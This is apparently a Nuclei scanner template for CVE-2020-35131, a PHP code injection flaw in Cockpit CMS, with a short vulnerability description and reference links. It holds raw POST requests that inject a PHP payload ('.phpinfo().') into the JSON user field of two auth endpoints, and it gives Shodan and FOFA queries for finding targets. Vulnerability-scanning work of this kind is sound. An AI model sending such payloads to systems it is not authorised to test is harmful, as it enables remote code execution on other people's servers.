Cockpit before 0.6.1 allows an attacker to inject custom PHP code and achieve Remote Command Execution via registerCriteriaFunction in lib/MongoLite/Database.php, as demonstrated by values in JSON data to the /auth/check or /auth/requestreset URI.
PoC代码[已公开]
id: CVE-2020-35131
info:
name: Cockpit CMS 0.6.1 - Remote Code Execution
author: DhiyaneshDK
severity: critical
description: |
Cockpit before 0.6.1 allows an attacker to inject custom PHP code and achieve Remote Command Execution via registerCriteriaFunction in lib/MongoLite/Database.php, as demonstrated by values in JSON data to the /auth/check or /auth/requestreset URI.
reference:
- https://github.com/agentejo/cockpit/commits/next/lib/MongoLite/Database.php
- https://github.com/agentejo/cockpit/releases/tag/0.6.1
- https://www.exploit-db.com/exploits/49390
- https://nvd.nist.gov/vuln/detail/CVE-2020-35131
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-35131
cwe-id: CWE-94
epss-score: 0.83821
epss-percentile: 0.99253
cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:*
metadata:
vendor: agentejo
product: cockpit
shodan-query: http.html:"cockpit"
fofa-query: app="Cockpit"
max-request: 2
verified: true
tags: cve,cve2020,rce,cockpit
variables:
rand_user: '{{rand_text_alpha(5)}}'
rand_password: '{{rand_text_alpha(5)}}'
http:
- raw:
- |
POST /auth/check HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json; charset=UTF-8
Origin: {{BaseURL}}
{"auth":{"user":"{{rand_user}}'.phpinfo().'","password":"{{rand_password}}"}}
- |
POST /auth/requestreset HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json; charset=UTF-8
Origin: {{BaseURL}}
{"user":"{{rand_user}}'.phpinfo().'"}
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "cockpit"
- "PHP Extension"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022069ece490cd0ce225f18f9d1c291df6eee98c7bd5b672983da7f84f57c35058ec022100e068667e0afc0aba129724e1589c7d331dbc5078fae3f3bae587299cabd73177:922c64590222798bb761d5b6d8e72950